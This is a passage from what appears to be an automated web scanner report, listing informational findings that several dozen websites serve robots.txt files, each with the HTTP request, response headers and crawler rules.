Cteonnt-Length: 818
Expires: Wed, 04 May 2011 01:59:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:59:39 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.1807. http://www.wolfcamera.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wolfcamera.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wolfcamera.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: CP="IDC DSP DEVa TAIa OUR BUS UNI STA",policyref="/w3c/p3p.xml"
Opt: http://www.w3.org/2000/P3Pv1
Content-Type: text/plain
ETag: "pvebad28bc65f1b135b4364bfa1d99d29d"
Expires: Wed, 04 May 2011 01:00:47 GMT
Cache-Control: public, s-maxage=3600, max-age=0
X-PvInfo: [S11101.C16864.A40435.RA0.G0.U27777053].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Date: Wed, 04 May 2011 01:30:29 GMT
Age: 3187
Content-Length: 434

Sitemap: http://www.wolfcamera.com/sitemap_index.xml

User-agent: BecomeBot
Disallow: /

User-agent: fatbot/1.0
Disallow: /

User-agent: *
Disallow: /search/
Disallow: /help/Product+Error+Page.htm
Dis
...[SNIP]...

27.1808. http://www.womenbehindbars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womenbehindbars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.womenbehindbars.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:36 GMT
Server: Apache
Last-Modified: Sat, 21 Aug 2010 06:45:22 GMT
ETag: "1a572ca-19-4c6f7602"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.1809. http://www.womensenews.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womensenews.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.womensenews.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:29 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Mon, 27 Oct 2008 00:23:08 GMT
ETag: "1640e91-65b-45a3122a55300"
Accept-Ranges: bytes
Content-Length: 1627
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

27.1810. http://www.woodheat.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woodheat.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodheat.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:03 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 17:00:48 GMT
ETag: "7e5c020-11d-4d750f40"
Accept-Ranges: bytes
Content-Length: 285
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

27.1811. http://www.woodsmith.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woodsmith.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodsmith.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:49 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 21:13:10 GMT
ETag: "a4000a-9f-494044679a580"
Accept-Ranges: bytes
Content-Length: 159
X-Internal-Server: web2
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.Woodsmith.com/

User-agent: Googlebot-Image
Disallow: /

User-Agent: *
Disallow: /cgi-bin
Disallow: /test
# End robots.txt

27.1812. http://www.woodworking.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woodworking.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodworking.com

Response

HTTP/1.1 200 OK
Content-Length: 189
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 18:51:42 GMT
Accept-Ranges: bytes
ETag: "8ccc92d79edcb1:bda1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:17 GMT
Connection: close

...User-agent: *
Disallow: /Console/
Disallow: /Uploads/
Disallow: /Integrations/
Disallow: /SDK/
http://www.woodworkersjournal.com/wj_sitemap.xml # Added by Google Sitemap Generator

27.1813. http://www.woodworking4home.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woodworking4home.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodworking4home.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:47 GMT
Server: Apache
Last-Modified: Thu, 19 Nov 2009 21:41:30 GMT
Accept-Ranges: bytes
Content-Length: 231
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: table_border_dashed.php
Disallow: testimonials-design.php
Disallow: privacy.php
Disallow: feedback-html.php
Disallow: thanks-for-your-feedback.php
Disallow: searchresults
...[SNIP]...

27.1814. http://www.wopular.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wopular.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wopular.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:54 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Last-Modified: Thu, 28 Apr 2011 00:01:55 GMT
ETag: "111f-4a1ef43e242c0"
Accept-Ranges: bytes
Content-Length: 4383
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:05:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

27.1815. http://www.wor710.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wor710.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wor710.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:07 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
Last-Modified: Wed, 24 Nov 2010 16:01:15 GMT
ETag: "41771-55-4ced36cb"
Accept-Ranges: bytes
Content-Length: 85
Keep-Alive: timeout=5, max=19994
Connection: close
Content-Type: text/plain; charset=utf-8
Set-Cookie: BIGipServerRadio_Pool=4061153347.20480.0000; path=/

...User-agent: *
Disallow: /email_story.php
Disallow: /print_page.php
Allow: /


27.1816. http://www.word2word.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.word2word.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.word2word.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:00 GMT
Server: Apache/2.0.63 (CentOS)
Last-Modified: Sat, 06 Nov 2010 21:48:42 GMT
ETag: "1d0211-107-5ac24280"
Accept-Ranges: bytes
Content-Length: 263
Connection: close
Content-Type: text/plain

# robots.txt for http://www.word2word.com/
User-agent: Mediapartners-Google*
User-agent: NetMechanic
User-agent: *
Disallow: /cgi-bin/ # This bans everything from the cgi-bin
Disallow: /meetme/ # This
...[SNIP]...

27.1817. http://www.workathomenoscams.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.workathomenoscams.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.workathomenoscams.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:42 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 30 Apr 2006 00:46:01 GMT
ETag: "129807d-1a-4129b430d0440"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1818. http://www.workingmother.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.workingmother.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.workingmother.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Apr 2011 12:48:57 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4a D=1784
Content-Type: text/plain
Content-Language: en
cache-control: max-age = 3600
Content-Length: 1590
Date: Wed, 04 May 2011 02:10:27 GMT
X-Varnish: 775738718 775738267
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache11: HIT 1

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1819. http://www.worldbook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldbook.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:29 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 02:54:04 GMT
Accept-Ranges: bytes
Content-Length: 319
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...

27.1820. http://www.worldbookonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldbookonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldbookonline.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 04 May 2011 03:15:42 GMT
Content-length: 778
Content-type: text/plain
Last-modified: Fri, 07 Jan 2011 18:22:24 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /student/
Disallow: /advanced/
Disallow: /kids/
Disallow: /pl/
Disallow: /discover/
Disallow: /wbdiscover/
Disallow: /eeh/
Disallow: /hispanica/
Disallow: /decouverte/
Disallow
...[SNIP]...

27.1821. http://www.worldchallenge.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldchallenge.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldchallenge.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:17 GMT
Server: Apache
Last-Modified: Wed, 28 Nov 2007 22:03:11 GMT
ETag: "3f910a-691-440045cfd65c0"
Accept-Ranges: bytes
Content-Length: 1681
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:38:17 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

27.1822. http://www.worldhairstyles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldhairstyles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldhairstyles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://worldhairstyles.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://worldhairstyles.com/sitemap.xml.gz

27.1823. http://www.worldschoolphotographs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldschoolphotographs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldschoolphotographs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:24:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Mon, 26 May 2008 23:01:08 GMT
ETag: "cc647-38-44e2a27abb500"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

User-Agent: Googlebot
Allow: /


27.1824. http://www.writinghelp-central.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.writinghelp-central.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.writinghelp-central.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:19 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.writinghelp-central.com/y8wwoqkS.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /
...[SNIP]...

27.1825. http://www.wrko.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wrko.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wrko.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain; charset=utf-8
Last-Modified: Thu, 28 Apr 2011 14:19:33 GMT
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:42:14 GMT
Vary: Accept-Encoding
X-AH-Environment: prod
Content-Length: 1572
Date: Wed, 04 May 2011 03:04:22 GMT
X-Varnish: 1313538392 1296110591
Age: 55328
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 109

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1826. http://www.wten.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wten.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wten.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:a0e"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 03:37:02 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 03:37:02 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.1827. http://www.wtok.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtok.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtok.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 02:00:50 GMT
X-Server-Name: dv-c1-r2-u14-b12
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 02:00:50 GMT
Content-Length: 55
Connection: close
Set-Cookie: click_mobile=0
X-N: S

User-agent: *
Disallow:/search
Disallow:/searchresults

27.1828. http://www.wtvm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtvm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtvm.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:ac9"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 00:56:41 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 00:56:41 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.1829. http://www.wyndhamworldwide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wyndhamworldwide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wyndhamworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:48 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1450
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /careers/popup.cfm
Disallow: /careers/wvr-asia-pacific.cfm
Disallow: /careers2/
Disallow: /customer_care/data-claim.
...[SNIP]...

27.1830. http://www.x-tremegeek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x-tremegeek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.x-tremegeek.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:27 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 13:50:08 GMT
ETag: "422cfc-48a-49101a8184400"
Accept-Ranges: bytes
Content-Length: 1162
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

27.1831. http://www.xp3.biz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xp3.biz
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xp3.biz

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:23 GMT
Server: Apache
Last-Modified: Thu, 05 Apr 2007 04:38:56 GMT
ETag: "e038d-22-42d5626121800"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

27.1832. http://www.xteenultra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xteenultra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xteenultra.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:12:26 GMT
Content-Type: text/plain
Content-Length: 121
Last-Modified: Sat, 07 Jul 2007 08:06:02 GMT
Connection: close
Vary: Accept-Encoding
Expires: Fri, 03 Jun 2011 01:12:26 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: *
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /log/
Disallow: /sys_log/
Disallow: /cj_out.php

27.1833. http://www.xvidmovies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xvidmovies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xvidmovies.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 06:14:56 GMT
Server: Apache/1.3.29 (Unix) PHP/4.3.10
Last-Modified: Sun, 05 Jul 2009 13:55:24 GMT
ETag: "688ea9-43-4a50b0cc"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /cgi-bin
Disallow: /errors
Disallow: /news

27.1834. http://www.yachtingmagazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yachtingmagazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yachtingmagazine.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:17:05 GMT
Server: Apache
Last-Modified: Fri, 25 Jun 2010 17:34:41 GMT
Accept-Ranges: bytes
Content-Length: 1678
Cache-Control: max-age=3600
Expires: Wed, 18 May 2011 03:17:05 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=1589
Connection: close
Content-Type: text/plain
Content-Language: en

# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.
...[SNIP]...

27.1835. http://www.yamahapartshouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yamahapartshouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yamahapartshouse.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 08 Nov 2007 04:22:48 GMT
Accept-Ranges: bytes
ETag: "5cb5f84bf21c81:62d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:05 GMT
Connection: close

User-agent: *

Disallow:

27.1836. http://www.yeah1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yeah1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yeah1.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 25 Mar 2011 09:51:37 GMT
ETag: "204140d-18-49f4b8a35fc40"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /


27.1837. http://www.yellowairplane.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowairplane.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yellowairplane.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:07:08 GMT
Content-Length: 50
Content-Type: text/plain
Content-Location: http://www.yellowairplane.com/robots.txt
Last-Modified: Wed, 16 Sep 2009 22:08:57 GMT
Accept-Ranges: bytes
ETag: "292490491a37ca1:6b9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: BlueStripe.PVN=1e2000015d57; path=/

User-agent: Mediapartners-Google*
Disallow:


27.1838. http://www.ymlp186.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp186.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ymlp186.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:31:13 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 09:47:55 GMT
ETag: "18e3bc8-24-4a03ce31308c0"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

27.1839. http://www.ymlp70.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp70.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ymlp70.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:48:00 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 09:47:55 GMT
ETag: "18e3bc8-24-4a03ce31308c0"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

27.1840. http://www.yorkdispatch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yorkdispatch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yorkdispatch.com

Response

HTTP/1.0 200 OK
Content-Length: 119
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 22:15:36 GMT
Accept-Ranges: bytes
ETag: "074a8411a16ca1:3044"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Wed, 04 May 2011 01:24:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:24:01 GMT
Connection: close

User-agent: *
Disallow: /portlet/
Disallow: /circare/
Crawl-delay: 5

Sitemap: http://www.yorkdispatch.com/sitemap.xml

27.1841. http://www.yourdailyjournal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourdailyjournal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yourdailyjournal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
Cache-Control: no-cache
Set-Cookie: _session_id=f58b9856ef62d55a0eed6f9eccd99b8c; path=/
Content-Length: 454
Status: 200 OK
Connection: close
Content-Type: text/plain; charset=utf-8

Sitemap: http://yourdailyjournal.com/news_sitemap.xml
User-agent: *
Disallow: /pages/results/recommend_listing/
Disallow: /pages/recommend_ad
Disallow: /*/add_tag
Disallow: /pages/results/search_resul
...[SNIP]...

27.1842. http://www.youreviewelectronics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youreviewelectronics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youreviewelectronics.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:41 GMT
Server: Apache
Last-Modified: Sun, 07 Jun 2009 17:23:26 GMT
Accept-Ranges: bytes
Content-Length: 396
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed

...[SNIP]...

27.1843. http://www.yourfreequotes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourfreequotes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yourfreequotes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:50 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 13 Apr 2011 14:43:54 GMT
ETag: "2415c-cc-4a0cdd67b7e80"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: WILDCAT_SERVER=4; path=/

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1844. http://www.yourkwoffice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourkwoffice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yourkwoffice.com

Response

HTTP/1.0 200 OK
Content-length: 1031
Content-type: text/plain
Last-modified: Wed, 04 May 2011 01:35:08 GMT
Expires: Wed, 04 May 2011 01:45:08 GMT
Cache-Control: max-age=600
Server: Concealed by Juniper Networks DX
Connection: close
Via: 1.1 dx2 (Juniper Networks Application Acceleration Platform - DX 5.3.8 0)

User-agent: TruliaBot
Disallow:

User-agent: Fasterfox
Disallow: /

User-agent: IRLbot
Disallow: /

User-agent: *
Disallow: /mcj/user/core_images/
